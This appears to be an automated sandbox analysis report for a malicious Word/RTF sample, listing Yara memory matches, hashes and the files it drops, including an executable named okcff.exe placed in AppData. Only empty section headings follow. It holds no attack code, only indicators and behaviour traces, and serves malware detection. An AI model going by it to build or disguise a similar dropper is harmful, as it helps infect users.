Source: Yara match	File source: 00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.618395445.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.617550638.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.615331968.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: okcff.exe PID: 2656, type: MEMORYSTR

ID:	553100
Product:	CloudBasic
Start time:	10:22:19
Start date:	14.01.2022
Sample:	478644.doc
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	c0f8f2fc481e9be7141d84b401edf1f7
SHA1:	ab1dbe841b083ea886c9023307c0527f7bfbfff3
SHA256:	4b0d21f58347c62f76445c6aa17a21dd00970f235734a1d1db4a40ee5a8b7c45
Filetype:	Rich Text Format (5005/1) 55.56%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	E9416A322E9A796D45588BC4FB04CD45	8D261D205C8D34A4A24B713DD6B9585647B8BDEB	F2DA177AFF59093ABE1D3BC7C1A769BE2701784036C398900A43725D83C9E9A9
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\570DA74A.wmf	Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"	F238B72FF240B9EA28769FFFB0C11843	54EDB9197B4A4C9C3CFFF894A83174DD17DDA9D2	A37AE38F17314E0B3C0967F597285E9EC9CA175B6DC223ECF76BC6CE79586E05
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7CE2D32D.png	370 sysV pure executable	A8A92E1C3D97E40596840C5045F94F67	B2B4FB6D579C92F649582F63CC89D7B190AD8025	2C26843633ABB38F10B1D93AF2D96AC746C7C060EF69E06B113707F3F7FE8E74
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp	Composite Document File V2 Document, Cannot read section info	D7EF29F80097BDF434F81F076289F2D4	231DCAD0641F6DDF6D28A89D9AAF4102B261E693	8451756E2D56C1A430FCABA7DB51CF20ADEA6B83DB858E18AF6ABE4441238EA9
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4FAE5255-02F9-464D-A70F-CC3F2B77B94E}.tmp	data	21C2AF2BB9957FFECAD589E76FF8BA89	08DDE72BB9349A555263E85CCDC477DB202E85FE	79586CFF1216985B54C69EC7D60FEB94DE375C824B633C32151F883FC4822991
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5349C035-C6A0-4C16-B632-E1A36FB414FC}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8C959E4C-92E1-4241-AA94-1568DABC6F24}.tmp	data	D320E2636A4FE368F1DD1721A88C0B72	6DE8E522B7C191677F9A8668BFF895F3E7E0FB64	C73D18662DFD69AABA06F46A599560EC230124395B678230C4F0F8DFE83CA475
C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT	data	30DD770655427043A65B4CA45F7443C6	3BBC7640A0D21F941D342532405FE6B62BC1C423	C48F7949E36EA00828F752C9A5A2BAA48FA6F867BA9013025B6D6CB858F31768
C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT:Zone.Identifier	ASCII text, with CRLF line terminators	FBCCF14D504B7B2DBCB5A5BDA75BD93B	D59FC84CDD5217C6CF74785703655F78DA6B582B	EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\478644.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:56 2021, mtime=Mon Aug 30 20:08:56 2021, atime=Fri Jan 14 17:22:23 2022, length=392070, window=hide	0F74FC3AD8670059320D5A7767BB0A3E	6305BC2235CB1924EAB45008C8B4FD0BB9B6CFF9	132354D2946AB264EFA224DF2AE58E9BA7FB67122F3672BC8F6A564CBF8C609A
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	0BF65FC4D2E1FE20737B46427E7DB0D2	F210ABEDA65F65C2DE79F07D3049C4C5DB489CF6	612DDD432589CB1586BEE2B9173D880A3E1FDBA888D40DB2D8D8F6AE9A96E186
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	45B1E2B14BE6C1EFC217DCE28709F72D	64E3E91D6557D176776A498CF0776BE3679F13C3	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex	Little-endian UTF-16 Unicode text, with no line terminators	F3B25701FE362EC84616A93A45CE9998	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)	data	484FCA57FA5B39E59B75DE31E510D704	A9A4B2579158D1C71122D7C1418C78B497B41570	80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms2E (copy)	data	484FCA57FA5B39E59B75DE31E510D704	A9A4B2579158D1C71122D7C1418C78B497B41570	80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msio (copy)	data	484FCA57FA5B39E59B75DE31E510D704	A9A4B2579158D1C71122D7C1418C78B497B41570	80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FQ6733LFPKS74NKOVPFM.temp	data	484FCA57FA5B39E59B75DE31E510D704	A9A4B2579158D1C71122D7C1418C78B497B41570	80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O2GRPLQKV4A3U7C26MID.temp	data	484FCA57FA5B39E59B75DE31E510D704	A9A4B2579158D1C71122D7C1418C78B497B41570	80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TM4WFGYHJ2HGTOWTIN9Q.temp	data	484FCA57FA5B39E59B75DE31E510D704	A9A4B2579158D1C71122D7C1418C78B497B41570	80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
C:\Users\user\AppData\Roaming\okcff.exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	E9416A322E9A796D45588BC4FB04CD45	8D261D205C8D34A4A24B713DD6B9585647B8BDEB	F2DA177AFF59093ABE1D3BC7C1A769BE2701784036C398900A43725D83C9E9A9
C:\Users\user\Desktop\~$478644.doc	data	45B1E2B14BE6C1EFC217DCE28709F72D	64E3E91D6557D176776A498CF0776BE3679F13C3	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6

Windows Analysis Report 478644.doc

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs